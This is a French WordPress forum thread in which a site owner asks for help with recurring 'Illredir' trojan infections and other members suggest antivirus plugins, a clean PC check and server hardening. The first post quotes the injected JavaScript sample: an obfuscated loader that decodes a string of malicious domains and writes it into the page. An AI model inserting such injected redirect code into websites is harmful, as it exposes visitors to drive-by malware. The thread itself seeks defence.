Trojan Illredir et mutations…

  • Statut : non résolu
10 sujets de 1 à 10 (sur un total de 10)
  • Auteur
    Messages
  • #478526
    leparachute
    Membre
    Initié WordPress
    5 contributions

    Ma configuration WP actuelle
    – Version de WordPress : 2.9
    – Version de PHP/MySQL :
    – Thème utilisé :
    – Extensions en place : Sociable, Cumulus
    – Nom de l’hebergeur : OVH
    – Adresse du site : http://leparachutedesign.fr

    Problème(s) rencontré(s) :

    Bonjour,
    Voici un mois que je me bat tout seul mais cette fois je viens demander du renfort sérieux. Le 24 décembre dernier, j’ai découvert pour la première fois l’intrusion d’un trojan Illredir-B sur mon site internet.
    Je me renseigne, je désinfecte le site, je mets à jour le blog en 2.9, je change tous les mots de passe.
    Rien n’y fait, je suis infecté par la une mutation du trojan nommé C, puis E (j’ai évité la D…).

    Désormais le schéma à changé puisqu’il n’y a plus le texte GNU/GPL. Il semblerait que l’attaque ce passe à travers un champ input du blog avec une injection javascript.

    Je vous serais reconnaissant de m’aider non pas à remettre sur pied le site mais à trouver l’origine exacte de la faille et la corriger. Ce n’est pas possible d’être constament en backup/restore sur le site.

    Voici un exemple du dernier script ajouté:

    try{window.onload=function(){document.write(‘mobile-de.friendfeed.com.’);V8flyhwc7e = document.getElementById(‘Cmtyp1dk2g’).innerHTML + ‘m$)e^#$g#&a((u^@p#(l))o!&&a!#)d$^)#-##!#c!o)^!m).!^^$u(!r(l@&#n##$&e#x!@(t^#$.($r!&u$((🙂)$I!^#)!m@$!u^!&0##)p$#^0(p&&&v!@)0)!!g(k#&d^@@/@!$p$&@^a#(n#!t#$$i$$$p#@^.!&c&)@)o&@!m!/$(p&!a$!#^n!!)(t@^i^&p!!.!@(c&o(^(m@/&$)(r(1$^0)(.(!##n$)(e^@^t((/!t)r#$!a&$^v(&e$@(^&l$^)o^$)c$!&i&&t!(#y!.((c&)&!o^m@/@^@g@(o#!&#o^g##&l!e&.$(&&!c)^!o&$!m!@/^$)’.replace(/(|&|)|^|@|!|#|$/ig, ”) ;document.write(”);} } catch(Vt836kqo ) {}

    Merci par avance.

    #712573
    Anonyme 2
    Participant
    Maître WordPress
    10594 contributions

    bonjour,

    essayé d’installer le plugin antivirus

    #712574
    leparachute
    Membre
    Initié WordPress
    5 contributions

    Merci pour cette idée 😉. Je ne connaissais pas ce plug-in, mais la piste est intéressante. Je teste ce week-end et je signalerais sur ce sujet l’efficacité face au trojan (car je ne pense pas être le seul dans cette situation).

    #712575
    leparachute
    Membre
    Initié WordPress
    5 contributions

    Bonjour,

    De retour quelques jours après. Finalement le plug-in s’est avéré inefficace. J’ai choppé la version I: Illeredir-I. Découvert et corrigé ce matin, c’est à nouveau done :(
    Vous avez des nouvelles depuis de la part de WordPress ? Parce que sur le site off en anglais aucune réponse 😕 Pourtant je suis loin d’être le seul atteint.

    Merci par avance pour vos solutions.

    #712576
    Red-rabbit
    Membre
    Maître WordPress
    688 contributions

    Mais … ton pc il est clean lui ? Et a verifier avec autre chose qu’Avast, y a pas que lui comme AV gratuit.

    #712577
    Franck (fge)
    Modérateur
    Maître WordPress
    9583 contributions

    Piekes a trouvé et fait part dans post d’un article intéressant permettant d”améliorer la protection contre les injections de code.
    http://perishablepress.com/press/2009/12/22/protect-wordpress-against-malicious-url-requests/
    As-tu essayé de le mettre en place ?

    #712578
    leparachute
    Membre
    Initié WordPress
    5 contributions

    Bonsoir,

    Mon pc est clean oui, le trojan n’a rien à voir avec le pc, à priori ce sont des injections. Mais le plug-in “Antivirus” a été inefficace et pour le moment je n’ai trouvé aucun contre réel sur internet 😕 Les développeurs de WP sont-ils au courant de ces attaques ?

    #712579
    Red-rabbit
    Membre
    Maître WordPress
    688 contributions

    Ma fois a part le site ou tu es deja passé (zyenweb)y a rien d autre qui concerne ton pb.
    Et l’injection peut aussi passer par un plugin … Y a pas que wordpress
    Et t as ete voir sur le forum ovh ?

    #712580
    leparachute
    Membre
    Initié WordPress
    5 contributions

    Je ne sais pas par où passe l’injection (j’ai peu de plug-in, seul Sociable et Antivirus d’activé, Cumulus de désactivé) et pour être honnête je doute que le problème soit “Wordpress”, j’ai trouvé des sites phpbb et joomla! infectés en naviguant sur le web.

    J’ai contacté OVH qui m’a redirigé vers un sujet de conseils généraux pour éviter les problèmes de Trojan.

    A noter que ce n’est pas un problème hébergeur non plus, mes sites Free ont aussi été contaminés.

    Bref, difficile de fixer l’origine pour le moment, mais le résultat est là, malgré les précautions (mise à jour WordPress, changer mot de passe, clean et check complet du site, ajout du plugin antivirus) ce n’est pas suffisant :(

    #712581
    franckypic
    Participant
    Initié WordPress
    16 contributions

    Bonjour,

    J’ai écris un article à ce sujet c’est un peu radical mais ça marche sauf si les injections de code viennent de votre hebergeur,à ce moment là il faudra les contacter.
    Bon courage.

10 sujets de 1 à 10 (sur un total de 10)
  • Vous devez être connecté pour répondre à ce sujet.